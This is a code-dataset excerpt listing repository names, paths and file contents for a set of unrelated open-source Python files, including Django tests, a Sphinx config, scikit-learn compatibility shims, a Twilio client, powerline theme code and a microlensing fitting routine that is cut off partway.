repo_name
stringlengths 5
100
| ref
stringlengths 12
67
| path
stringlengths 4
244
| copies
stringlengths 1
8
| content
stringlengths 0
1.05M
⌀ |
|---|---|---|---|---|
awemulya/fieldsight-kobocat
|
refs/heads/master
|
onadata/apps/main/tests/test_form_enter_data.py
|
1
|
import os
import re
import requests
import unittest
from urlparse import urlparse
from time import time
from httmock import urlmatch, HTTMock
from django.test import RequestFactory
from django.core.urlresolvers import reverse
from django.core.validators import URLValidator
from django.conf import settings
from django.contrib.auth.models import AnonymousUser
from nose import SkipTest
from onadata.apps.main.views import set_perm, show, qrcode
from onadata.apps.main.models import MetaData
from onadata.apps.logger.views import enter_data
from onadata.libs.utils.viewer_tools import enketo_url
from test_base import TestBase
@urlmatch(netloc=r'(.*\.)?enketo\.formhub\.org$')
def enketo_mock(url, request):
response = requests.Response()
response.status_code = 201
response._content = '{"url": "https://hmh2a.enketo.formhub.org"}'
return response
@urlmatch(netloc=r'(.*\.)?enketo\.formhub\.org$')
def enketo_error_mock(url, request):
response = requests.Response()
response.status_code = 400
response._content = '{"message": ' \
'"no account exists for this OpenRosa server"}'
return response
class TestFormEnterData(TestBase):
def setUp(self):
TestBase.setUp(self)
self._create_user_and_login()
self._publish_transportation_form_and_submit_instance()
self.perm_url = reverse(set_perm, kwargs={
'username': self.user.username, 'id_string': self.xform.id_string})
self.show_url = reverse(show, kwargs={'uuid': self.xform.uuid})
self.url = reverse(enter_data, kwargs={
'username': self.user.username,
'id_string': self.xform.id_string
})
def _running_enketo(self, check_url=False):
if hasattr(settings, 'ENKETO_URL') and \
(not check_url or self._check_url(settings.ENKETO_URL)):
return True
return False
def test_enketo_remote_server(self):
if not self._running_enketo():
raise SkipTest
with HTTMock(enketo_mock):
server_url = 'https://testserver.com/bob'
form_id = "test_%s" % re.sub(re.compile("\."), "_", str(time()))
url = enketo_url(server_url, form_id)
self.assertIsInstance(url, basestring)
self.assertIsNone(URLValidator()(url))
def _get_grcode_view_response(self):
factory = RequestFactory()
request = factory.get('/')
request.user = self.user
response = qrcode(
request, self.user.username, self.xform.id_string)
return response
@unittest.skip('Fails under Django 1.6')
def test_qrcode_view(self):
with HTTMock(enketo_mock):
response = self._get_grcode_view_response()
qrfile = os.path.join(
self.this_directory, 'fixtures', 'qrcode.response')
with open(qrfile, 'r') as f:
data = f.read()
self.assertContains(response, data.strip(), status_code=200)
@unittest.skip('Fails under Django 1.6')
def test_qrcode_view_with_enketo_error(self):
with HTTMock(enketo_error_mock):
response = self._get_grcode_view_response()
self.assertEqual(response.status_code, 400)
@unittest.skip('Fails under Django 1.6')
def test_enter_data_redir(self):
if not self._running_enketo():
raise SkipTest
with HTTMock(enketo_mock):
factory = RequestFactory()
request = factory.get('/')
request.user = self.user
response = enter_data(
request, self.user.username, self.xform.id_string)
# make sure response redirect to an enketo site
enketo_base_url = urlparse(settings.ENKETO_URL).netloc
redirected_base_url = urlparse(response['Location']).netloc
# TODO: checking if the form is valid on enketo side
self.assertIn(enketo_base_url, redirected_base_url)
self.assertEqual(response.status_code, 302)
def test_enter_data_no_permission(self):
response = self.anon.get(self.url)
self.assertEqual(response.status_code, 403)
@unittest.skip('Fails under Django 1.6')
def test_public_with_link_to_share_toggle_on(self):
# sharing behavior as of 09/13/2012:
# it requires both data_share and form_share both turned on
# in order to grant anon access to form uploading
# TODO: findout 'for_user': 'all' and what it means
response = self.client.post(self.perm_url, {'for_user': 'all',
'perm_type': 'link'})
self.assertEqual(response.status_code, 302)
self.assertEqual(MetaData.public_link(self.xform), True)
# toggle shared on
self.xform.shared = True
self.xform.shared_data = True
self.xform.save()
response = self.anon.get(self.show_url)
self.assertEqual(response.status_code, 302)
if not self._running_enketo():
raise SkipTest
with HTTMock(enketo_mock):
factory = RequestFactory()
request = factory.get('/')
request.user = AnonymousUser()
response = enter_data(
request, self.user.username, self.xform.id_string)
self.assertEqual(response.status_code, 302)
def test_enter_data_non_existent_user(self):
url = reverse(enter_data, kwargs={
'username': 'nonexistentuser',
'id_string': self.xform.id_string
})
response = self.anon.get(url)
self.assertEqual(response.status_code, 404)
|
divio/django-cms
|
refs/heads/develop
|
menus/exceptions.py
|
2
|
class NamespaceAlreadyRegistered(Exception):
pass
class NoParentFound(Exception):
pass
|
petroniocandido/pyFTS
|
refs/heads/master
|
docs/conf.py
|
1
|
# -*- coding: utf-8 -*-
#
# Configuration file for the Sphinx documentation builder.
#
# This file does only contain a selection of the most common options. For a
# full list see the documentation:
# http://www.sphinx-doc.org/en/stable/config
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
sys.path.insert(0, os.path.abspath('../pyFTS'))
# -- Project information -----------------------------------------------------
project = 'pyFTS'
copyright = '2018, Machine Intelligence and Data Science Laboratory - UFMG - Brazil'
author = 'Machine Intelligence and Data Science Laboratory - UFMG - Brazil'
# The short X.Y version
version = '1'
# The full version, including alpha/beta/rc tags
release = '1.6'
# -- General configuration ---------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.intersphinx',
'sphinx.ext.coverage',
'sphinx.ext.mathjax',
'sphinx.ext.ifconfig',
'sphinx.ext.viewcode',
'sphinx.ext.githubpages',
'sphinxcontrib.googleanalytics'
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path .
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'bizstyle'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
html_theme_options = {
# 'full_logo': True
}
html_logo = 'logo_heading2.png'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['static']
# Custom sidebar templates, must be a dictionary that maps document names
# to template names.
#
# The default sidebars (for documents that don't match any pattern) are
# defined by theme itself. Builtin themes are using these templates by
# default: ``['localtoc.html', 'relations.html', 'sourcelink.html',
# 'searchbox.html']``.
#
# html_sidebars = {}
# -- Options for HTMLHelp output ---------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'pyFTSdoc'
# -- Options for LaTeX output ------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'pyFTS.tex', 'pyFTS Documentation',
'Machine Intelligence and Data Science Laboratory - UFMG - Brazil', 'manual'),
]
# -- Options for manual page output ------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'pyfts', 'pyFTS Documentation',
[author], 1)
]
# -- Options for Texinfo output ----------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'pyFTS', 'pyFTS Documentation',
author, 'pyFTS', 'One line description of project.',
'Miscellaneous'),
]
# -- Extension configuration -------------------------------------------------
googleanalytics_id = 'UA-55120145-3'
# -- Options for intersphinx extension ---------------------------------------
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {'https://docs.python.org/': None}
|
anntzer/numpy
|
refs/heads/master
|
numpy/typing/tests/data/reveal/flatiter.py
|
2
|
from typing import Any
import numpy as np
a: np.flatiter[np.ndarray[Any, np.dtype[np.str_]]]
reveal_type(a.base) # E: numpy.ndarray[Any, numpy.dtype[numpy.str_]]
reveal_type(a.copy()) # E: numpy.ndarray[Any, numpy.dtype[numpy.str_]]
reveal_type(a.coords) # E: tuple[builtins.int]
reveal_type(a.index) # E: int
reveal_type(iter(a)) # E: Iterator[numpy.str_]
reveal_type(next(a)) # E: numpy.str_
reveal_type(a[0]) # E: numpy.str_
reveal_type(a[[0, 1, 2]]) # E: numpy.ndarray[Any, numpy.dtype[numpy.str_]]
reveal_type(a[...]) # E: numpy.ndarray[Any, numpy.dtype[numpy.str_]]
reveal_type(a[:]) # E: numpy.ndarray[Any, numpy.dtype[numpy.str_]]
reveal_type(a.__array__()) # E: numpy.ndarray[Any, numpy.dtype[numpy.str_]]
reveal_type(a.__array__(np.float64)) # E: numpy.ndarray[Any, numpy.dtype[Any]]
|
herilalaina/scikit-learn
|
refs/heads/master
|
sklearn/utils/fixes.py
|
10
|
"""Compatibility fixes for older version of python, numpy and scipy
If you add content to this file, please give the version of the package
at which the fixe is no longer needed.
"""
# Authors: Emmanuelle Gouillart <emmanuelle.gouillart@normalesup.org>
# Gael Varoquaux <gael.varoquaux@normalesup.org>
# Fabian Pedregosa <fpedregosa@acm.org>
# Lars Buitinck
#
# License: BSD 3 clause
import warnings
import os
import errno
import numpy as np
import scipy.sparse as sp
import scipy
try:
from inspect import signature
except ImportError:
from ..externals.funcsigs import signature
def _parse_version(version_string):
version = []
for x in version_string.split('.'):
try:
version.append(int(x))
except ValueError:
# x may be of the form dev-1ea1592
version.append(x)
return tuple(version)
euler_gamma = getattr(np, 'euler_gamma',
0.577215664901532860606512090082402431)
np_version = _parse_version(np.__version__)
sp_version = _parse_version(scipy.__version__)
# Remove when minimum required NumPy >= 1.10
try:
if (not np.allclose(np.divide(.4, 1, casting="unsafe"),
np.divide(.4, 1, casting="unsafe", dtype=np.float64))
or not np.allclose(np.divide(.4, 1), .4)):
raise TypeError('Divide not working with dtype: '
'https://github.com/numpy/numpy/issues/3484')
divide = np.divide
except TypeError:
# Compat for old versions of np.divide that do not provide support for
# the dtype args
def divide(x1, x2, out=None, dtype=None):
out_orig = out
if out is None:
out = np.asarray(x1, dtype=dtype)
if out is x1:
out = x1.copy()
else:
if out is not x1:
out[:] = x1
if dtype is not None and out.dtype != dtype:
out = out.astype(dtype)
out /= x2
if out_orig is None and np.isscalar(x1):
out = np.asscalar(out)
return out
try:
with warnings.catch_warnings(record=True):
# Don't raise the numpy deprecation warnings that appear in
# 1.9, but avoid Python bug due to simplefilter('ignore')
warnings.simplefilter('always')
sp.csr_matrix([1.0, 2.0, 3.0]).max(axis=0)
except (TypeError, AttributeError):
# in scipy < 14.0, sparse matrix min/max doesn't accept an `axis` argument
# the following code is taken from the scipy 0.14 codebase
def _minor_reduce(X, ufunc):
major_index = np.flatnonzero(np.diff(X.indptr))
value = ufunc.reduceat(X.data, X.indptr[major_index])
return major_index, value
def _min_or_max_axis(X, axis, min_or_max):
N = X.shape[axis]
if N == 0:
raise ValueError("zero-size array to reduction operation")
M = X.shape[1 - axis]
mat = X.tocsc() if axis == 0 else X.tocsr()
mat.sum_duplicates()
major_index, value = _minor_reduce(mat, min_or_max)
not_full = np.diff(mat.indptr)[major_index] < N
value[not_full] = min_or_max(value[not_full], 0)
mask = value != 0
major_index = np.compress(mask, major_index)
value = np.compress(mask, value)
from scipy.sparse import coo_matrix
if axis == 0:
res = coo_matrix((value, (np.zeros(len(value)), major_index)),
dtype=X.dtype, shape=(1, M))
else:
res = coo_matrix((value, (major_index, np.zeros(len(value)))),
dtype=X.dtype, shape=(M, 1))
return res.A.ravel()
def _sparse_min_or_max(X, axis, min_or_max):
if axis is None:
if 0 in X.shape:
raise ValueError("zero-size array to reduction operation")
zero = X.dtype.type(0)
if X.nnz == 0:
return zero
m = min_or_max.reduce(X.data.ravel())
if X.nnz != np.product(X.shape):
m = min_or_max(zero, m)
return m
if axis < 0:
axis += 2
if (axis == 0) or (axis == 1):
return _min_or_max_axis(X, axis, min_or_max)
else:
raise ValueError("invalid axis, use 0 for rows, or 1 for columns")
def sparse_min_max(X, axis):
return (_sparse_min_or_max(X, axis, np.minimum),
_sparse_min_or_max(X, axis, np.maximum))
else:
def sparse_min_max(X, axis):
return (X.min(axis=axis).toarray().ravel(),
X.max(axis=axis).toarray().ravel())
if sp_version < (0, 15):
# Backport fix for scikit-learn/scikit-learn#2986 / scipy/scipy#4142
from ._scipy_sparse_lsqr_backport import lsqr as sparse_lsqr
else:
from scipy.sparse.linalg import lsqr as sparse_lsqr # noqa
try: # SciPy >= 0.19
from scipy.special import comb, logsumexp
except ImportError:
from scipy.misc import comb, logsumexp # noqa
if sp_version >= (0, 19):
def _argmax(arr_or_spmatrix, axis=None):
return arr_or_spmatrix.argmax(axis=axis)
else:
# Backport of argmax functionality from scipy 0.19.1, can be removed
# once support for scipy 0.18 and below is dropped
def _find_missing_index(ind, n):
for k, a in enumerate(ind):
if k != a:
return k
k += 1
if k < n:
return k
else:
return -1
def _arg_min_or_max_axis(self, axis, op, compare):
if self.shape[axis] == 0:
raise ValueError("Can't apply the operation along a zero-sized "
"dimension.")
if axis < 0:
axis += 2
zero = self.dtype.type(0)
mat = self.tocsc() if axis == 0 else self.tocsr()
mat.sum_duplicates()
ret_size, line_size = mat._swap(mat.shape)
ret = np.zeros(ret_size, dtype=int)
nz_lines, = np.nonzero(np.diff(mat.indptr))
for i in nz_lines:
p, q = mat.indptr[i:i + 2]
data = mat.data[p:q]
indices = mat.indices[p:q]
am = op(data)
m = data[am]
if compare(m, zero) or q - p == line_size:
ret[i] = indices[am]
else:
zero_ind = _find_missing_index(indices, line_size)
if m == zero:
ret[i] = min(am, zero_ind)
else:
ret[i] = zero_ind
if axis == 1:
ret = ret.reshape(-1, 1)
return np.asmatrix(ret)
def _arg_min_or_max(self, axis, out, op, compare):
if out is not None:
raise ValueError("Sparse matrices do not support "
"an 'out' parameter.")
# validateaxis(axis)
if axis is None:
if 0 in self.shape:
raise ValueError("Can't apply the operation to "
"an empty matrix.")
if self.nnz == 0:
return 0
else:
zero = self.dtype.type(0)
mat = self.tocoo()
mat.sum_duplicates()
am = op(mat.data)
m = mat.data[am]
if compare(m, zero):
return mat.row[am] * mat.shape[1] + mat.col[am]
else:
size = np.product(mat.shape)
if size == mat.nnz:
return am
else:
ind = mat.row * mat.shape[1] + mat.col
zero_ind = _find_missing_index(ind, size)
if m == zero:
return min(zero_ind, am)
else:
return zero_ind
return _arg_min_or_max_axis(self, axis, op, compare)
def _sparse_argmax(self, axis=None, out=None):
return _arg_min_or_max(self, axis, out, np.argmax, np.greater)
def _argmax(arr_or_matrix, axis=None):
if sp.issparse(arr_or_matrix):
return _sparse_argmax(arr_or_matrix, axis=axis)
else:
return arr_or_matrix.argmax(axis=axis)
def parallel_helper(obj, methodname, *args, **kwargs):
"""Workaround for Python 2 limitations of pickling instance methods"""
return getattr(obj, methodname)(*args, **kwargs)
if 'exist_ok' in signature(os.makedirs).parameters:
makedirs = os.makedirs
else:
def makedirs(name, mode=0o777, exist_ok=False):
"""makedirs(name [, mode=0o777][, exist_ok=False])
Super-mkdir; create a leaf directory and all intermediate ones. Works
like mkdir, except that any intermediate path segment (not just the
rightmost) will be created if it does not exist. If the target
directory already exists, raise an OSError if exist_ok is False.
Otherwise no exception is raised. This is recursive.
"""
try:
os.makedirs(name, mode=mode)
except OSError as e:
if (not exist_ok or e.errno != errno.EEXIST
or not os.path.isdir(name)):
raise
if np_version < (1, 12):
class MaskedArray(np.ma.MaskedArray):
# Before numpy 1.12, np.ma.MaskedArray object is not picklable
# This fix is needed to make our model_selection.GridSearchCV
# picklable as the ``cv_results_`` param uses MaskedArray
def __getstate__(self):
"""Return the internal state of the masked array, for pickling
purposes.
"""
cf = 'CF'[self.flags.fnc]
data_state = super(np.ma.MaskedArray, self).__reduce__()[2]
return data_state + (np.ma.getmaskarray(self).tostring(cf),
self._fill_value)
else:
from numpy.ma import MaskedArray # noqa
|
jideobs/twilioAngular
|
refs/heads/master
|
venv/lib/python2.7/site-packages/twilio/rest/monitor.py
|
12
|
from twilio.rest.base import TwilioClient
from twilio.rest.resources import UNSET_TIMEOUT
from twilio.rest.resources.monitor.alerts import Alerts
from twilio.rest.resources.monitor.events import Events
class TwilioMonitorClient(TwilioClient):
"""
A client for accessing the Twilio Monitor API.
The Twilio Monitor API provides information about events. For more
information, see the
`Monitor API documentation <https://www.twilio.com/docs/XXX>`_.
:param str account: Your Account Sid from `your dashboard
<https://www.twilio.com/user/account>`_
:param str token: Your Auth Token from `your dashboard
<https://www.twilio.com/user/account>`_
:param float timeout: The socket and read timeout for requests to Twilio
"""
def __init__(self, account=None, token=None,
base="https://monitor.twilio.com", version="v1",
timeout=UNSET_TIMEOUT):
super(TwilioMonitorClient, self).__init__(account, token, base,
version, timeout)
self.version_uri = "%s/%s" % (base, version)
self.events = Events(self.version_uri, self.auth, timeout)
self.alerts = Alerts(self.version_uri, self.auth, timeout)
|
MSM8226-Samsung/android_kernel_samsung_ms013g
|
refs/heads/cm-13.0
|
scripts/tracing/draw_functrace.py
|
14679
|
#!/usr/bin/python
"""
Copyright 2008 (c) Frederic Weisbecker <fweisbec@gmail.com>
Licensed under the terms of the GNU GPL License version 2
This script parses a trace provided by the function tracer in
kernel/trace/trace_functions.c
The resulted trace is processed into a tree to produce a more human
view of the call stack by drawing textual but hierarchical tree of
calls. Only the functions's names and the the call time are provided.
Usage:
Be sure that you have CONFIG_FUNCTION_TRACER
# mount -t debugfs nodev /sys/kernel/debug
# echo function > /sys/kernel/debug/tracing/current_tracer
$ cat /sys/kernel/debug/tracing/trace_pipe > ~/raw_trace_func
Wait some times but not too much, the script is a bit slow.
Break the pipe (Ctrl + Z)
$ scripts/draw_functrace.py < raw_trace_func > draw_functrace
Then you have your drawn trace in draw_functrace
"""
import sys, re
class CallTree:
""" This class provides a tree representation of the functions
call stack. If a function has no parent in the kernel (interrupt,
syscall, kernel thread...) then it is attached to a virtual parent
called ROOT.
"""
ROOT = None
def __init__(self, func, time = None, parent = None):
self._func = func
self._time = time
if parent is None:
self._parent = CallTree.ROOT
else:
self._parent = parent
self._children = []
def calls(self, func, calltime):
""" If a function calls another one, call this method to insert it
into the tree at the appropriate place.
@return: A reference to the newly created child node.
"""
child = CallTree(func, calltime, self)
self._children.append(child)
return child
def getParent(self, func):
""" Retrieve the last parent of the current node that
has the name given by func. If this function is not
on a parent, then create it as new child of root
@return: A reference to the parent.
"""
tree = self
while tree != CallTree.ROOT and tree._func != func:
tree = tree._parent
if tree == CallTree.ROOT:
child = CallTree.ROOT.calls(func, None)
return child
return tree
def __repr__(self):
return self.__toString("", True)
def __toString(self, branch, lastChild):
if self._time is not None:
s = "%s----%s (%s)\n" % (branch, self._func, self._time)
else:
s = "%s----%s\n" % (branch, self._func)
i = 0
if lastChild:
branch = branch[:-1] + " "
while i < len(self._children):
if i != len(self._children) - 1:
s += "%s" % self._children[i].__toString(branch +\
" |", False)
else:
s += "%s" % self._children[i].__toString(branch +\
" |", True)
i += 1
return s
class BrokenLineException(Exception):
"""If the last line is not complete because of the pipe breakage,
we want to stop the processing and ignore this line.
"""
pass
class CommentLineException(Exception):
""" If the line is a comment (as in the beginning of the trace file),
just ignore it.
"""
pass
def parseLine(line):
line = line.strip()
if line.startswith("#"):
raise CommentLineException
m = re.match("[^]]+?\\] +([0-9.]+): (\\w+) <-(\\w+)", line)
if m is None:
raise BrokenLineException
return (m.group(1), m.group(2), m.group(3))
def main():
CallTree.ROOT = CallTree("Root (Nowhere)", None, None)
tree = CallTree.ROOT
for line in sys.stdin:
try:
calltime, callee, caller = parseLine(line)
except BrokenLineException:
break
except CommentLineException:
continue
tree = tree.getParent(caller)
tree = tree.calls(callee, calltime)
print CallTree.ROOT
if __name__ == "__main__":
main()
|
omergertel/chords
|
refs/heads/master
|
chords/exceptions.py
|
1
|
class ChordError(Exception):
pass
class UnsatisfiedResourcesError(ChordError):
pass
class UnknownResourceClassError(ChordError):
pass
class UnsatisfiableRequestError(ChordError):
pass
|
Luffin/powerline
|
refs/heads/develop
|
powerline/theme.py
|
23
|
# vim:fileencoding=utf-8:noet
from __future__ import (unicode_literals, division, absolute_import, print_function)
import itertools
from powerline.segment import gen_segment_getter, process_segment, get_fallback_segment
from powerline.lib.unicode import u, safe_unicode
def requires_segment_info(func):
func.powerline_requires_segment_info = True
return func
def requires_filesystem_watcher(func):
func.powerline_requires_filesystem_watcher = True
return func
def new_empty_segment_line():
return {
'left': [],
'right': []
}
def add_spaces_left(pl, amount, segment):
return (' ' * amount) + segment['contents']
def add_spaces_right(pl, amount, segment):
return segment['contents'] + (' ' * amount)
def add_spaces_center(pl, amount, segment):
amount, remainder = divmod(amount, 2)
return (' ' * (amount + remainder)) + segment['contents'] + (' ' * amount)
expand_functions = {
'l': add_spaces_right,
'r': add_spaces_left,
'c': add_spaces_center,
}
class Theme(object):
def __init__(self,
ext,
theme_config,
common_config,
pl,
get_module_attr,
top_theme,
colorscheme,
main_theme_config=None,
run_once=False,
shutdown_event=None):
self.colorscheme = colorscheme
self.dividers = theme_config['dividers']
self.dividers = dict((
(key, dict((k, u(v))
for k, v in val.items()))
for key, val in self.dividers.items()
))
try:
self.cursor_space_multiplier = 1 - (theme_config['cursor_space'] / 100)
except KeyError:
self.cursor_space_multiplier = None
self.cursor_columns = theme_config.get('cursor_columns')
self.spaces = theme_config['spaces']
self.segments = []
self.EMPTY_SEGMENT = {
'contents': None,
'highlight': {'fg': False, 'bg': False, 'attrs': 0}
}
self.pl = pl
theme_configs = [theme_config]
if main_theme_config:
theme_configs.append(main_theme_config)
get_segment = gen_segment_getter(
pl,
ext,
common_config,
theme_configs,
theme_config.get('default_module'),
get_module_attr,
top_theme
)
for segdict in itertools.chain((theme_config['segments'],),
theme_config['segments'].get('above', ())):
self.segments.append(new_empty_segment_line())
for side in ['left', 'right']:
for segment in segdict.get(side, []):
segment = get_segment(segment, side)
if segment:
if not run_once:
if segment['startup']:
try:
segment['startup'](pl, shutdown_event)
except Exception as e:
pl.error('Exception during {0} startup: {1}', segment['name'], str(e))
continue
self.segments[-1][side].append(segment)
def shutdown(self):
for line in self.segments:
for segments in line.values():
for segment in segments:
try:
segment['shutdown']()
except TypeError:
pass
def get_divider(self, side='left', type='soft'):
'''Return segment divider.'''
return self.dividers[side][type]
def get_spaces(self):
return self.spaces
def get_line_number(self):
return len(self.segments)
def get_segments(self, side=None, line=0, segment_info=None, mode=None):
'''Return all segments.
Function segments are called, and all segments get their before/after
and ljust/rjust properties applied.
:param int line:
Line number for which segments should be obtained. Is counted from
zero (botmost line).
'''
for side in [side] if side else ['left', 'right']:
parsed_segments = []
for segment in self.segments[line][side]:
if segment['display_condition'](self.pl, segment_info, mode):
process_segment(
self.pl,
side,
segment_info,
parsed_segments,
segment,
mode,
self.colorscheme,
)
for segment in parsed_segments:
self.pl.prefix = segment['name']
try:
width = segment['width']
align = segment['align']
if width == 'auto' and segment['expand'] is None:
segment['expand'] = expand_functions.get(align)
if segment['expand'] is None:
self.pl.error('Align argument must be “r”, “l” or “c”, not “{0}”', align)
try:
segment['contents'] = segment['before'] + u(
segment['contents'] if segment['contents'] is not None else ''
) + segment['after']
except Exception as e:
self.pl.exception('Failed to compute segment contents: {0}', str(e))
segment['contents'] = safe_unicode(segment.get('contents'))
# Align segment contents
if segment['width'] and segment['width'] != 'auto':
if segment['align'] == 'l':
segment['contents'] = segment['contents'].ljust(segment['width'])
elif segment['align'] == 'r':
segment['contents'] = segment['contents'].rjust(segment['width'])
elif segment['align'] == 'c':
segment['contents'] = segment['contents'].center(segment['width'])
# We need to yield a copy of the segment, or else mode-dependent
# segment contents can’t be cached correctly e.g. when caching
# non-current window contents for vim statuslines
yield segment.copy()
except Exception as e:
self.pl.exception('Failed to compute segment: {0}', str(e))
fallback = get_fallback_segment()
fallback.update(side=side)
yield fallback
|
xgds/xgds_sample
|
refs/heads/master
|
xgds_sample/management/appCommands/prep.py
|
1
|
#__BEGIN_LICENSE__
# Copyright (c) 2015, United States Government, as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All rights reserved.
#
# The xGDS platform is licensed under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0.
#
# Unless required by applicable law or agreed to in writing, software distributed
# under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
# CONDITIONS OF ANY KIND, either express or implied. See the License for the
# specific language governing permissions and limitations under the License.
#__END_LICENSE__
"""
This is a place to put any prep code you need to run before your app
is ready.
For example, you might need to render some icons. The convention for
that is to put the source data in your app's media_src directory and
render the icons into your app's build/media directory (outside version
control).
How this script gets run: when the site admin runs "./manage.py prep",
one of the steps is "prepapps", which calls
management/appCommands/prep.py command for each app (if it exists).
"""
from django.core.management.base import NoArgsCommand
from geocamUtil.management import commandUtil
class Command(NoArgsCommand):
help = 'Prep xgds_sample'
def handle_noargs(self, **options):
# put your code here
pass
|
NetApp/manila
|
refs/heads/master
|
manila/tests/fake_notifier.py
|
7
|
# Copyright 2014 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import collections
import functools
import oslo_messaging as messaging
from oslo_serialization import jsonutils
from manila import rpc
NOTIFICATIONS = []
def reset():
del NOTIFICATIONS[:]
FakeMessage = collections.namedtuple(
'Message',
['publisher_id', 'priority', 'event_type', 'payload'],
)
class FakeNotifier(object):
def __init__(self, transport, publisher_id, serializer=None):
self.transport = transport
self.publisher_id = publisher_id
for priority in ['debug', 'info', 'warn', 'error', 'critical']:
setattr(self, priority,
functools.partial(self._notify, priority.upper()))
self._serializer = serializer or messaging.serializer.NoOpSerializer()
def prepare(self, publisher_id=None):
if publisher_id is None:
publisher_id = self.publisher_id
return self.__class__(self.transport, publisher_id, self._serializer)
def _notify(self, priority, ctxt, event_type, payload):
payload = self._serializer.serialize_entity(ctxt, payload)
# NOTE(sileht): simulate the kombu serializer
# this permit to raise an exception if something have not
# been serialized correctly
jsonutils.to_primitive(payload)
msg = dict(publisher_id=self.publisher_id,
priority=priority,
event_type=event_type,
payload=payload)
NOTIFICATIONS.append(msg)
def stub_notifier(testcase):
testcase.mock_object(messaging, 'Notifier', FakeNotifier)
if rpc.NOTIFIER:
serializer = getattr(rpc.NOTIFIER, '_serializer', None)
testcase.mock_object(rpc, 'NOTIFIER',
FakeNotifier(rpc.NOTIFIER.transport,
rpc.NOTIFIER.publisher_id,
serializer=serializer))
|
ebachelet/pyLIMA
|
refs/heads/master
|
pyLIMA/microlguess.py
|
1
|
# -*- coding: utf-8 -*-
"""
Created on Mon May 23 16:00:51 2016
@author: ebachelet
"""
import numpy as np
import scipy.signal as ss
from pyLIMA import microltoolbox
def initial_guess_PSPL(event):
"""Function to find initial PSPL guess for Levenberg-Marquardt solver (method=='LM').
This assumes no blending.
:param object event: the event object on which you perform the fit on. More details on the
event module.
:return: the PSPL guess for this event. A list of parameters associated to the PSPL model + the source flux of
:return: the PSPL guess for this event. A list of parameters associated to the PSPL model + the source flux of
the survey telescope.
:rtype: list,float
"""
# to estimation
to_estimations = []
maximum_flux_estimations = []
errors_magnitude = []
for telescope in event.telescopes:
# Lot of process here, if one fails, just skip
lightcurve_magnitude = telescope.lightcurve_magnitude
mean_error_magnitude = np.mean(lightcurve_magnitude[:, 2])
try:
# only the best photometry
good_photometry_indexes = np.where((lightcurve_magnitude[:, 2] <
max(0.1, mean_error_magnitude)))[0]
lightcurve_bis = lightcurve_magnitude[good_photometry_indexes]
lightcurve_bis = lightcurve_bis[lightcurve_bis[:, 0].argsort(), :]
mag = lightcurve_bis[:, 1]
flux = microltoolbox.magnitude_to_flux(mag)
# clean the lightcurve using Savitzky-Golay filter on 3 points, degree 1.
mag_clean = ss.savgol_filter(mag, 3, 1)
time = lightcurve_bis[:, 0]
flux_clean = microltoolbox.flux_to_magnitude(mag_clean)
errmag = lightcurve_bis[:, 2]
flux_source = min(flux_clean)
good_points = np.where(flux_clean > flux_source)[0]
while (np.std(time[good_points]) > 5) | (len(good_points) > 100):
indexes = \
np.where((flux_clean[good_points] > np.median(flux_clean[good_points])) & (
errmag[good_points] <= max(0.1, 2.0 * np.mean(errmag[good_points]))))[0]
if len(indexes) < 1:
break
else:
good_points = good_points[indexes]
# gravity = (
# np.median(time[good_points]), np.median(flux_clean[good_points]),
# np.mean(errmag[good_points]))
# distances = np.sqrt((time[good_points] - gravity[0]) ** 2 / gravity[0] ** 2)
to = np.median(time[good_points])
max_flux = max(flux[good_points])
to_estimations.append(to)
maximum_flux_estimations.append(max_flux)
errors_magnitude.append(np.mean(lightcurve_bis[good_points, 2]))
except:
time = lightcurve_magnitude[:, 0]
flux = microltoolbox.magnitude_to_flux(lightcurve_magnitude[:, 1])
to = np.median(time)
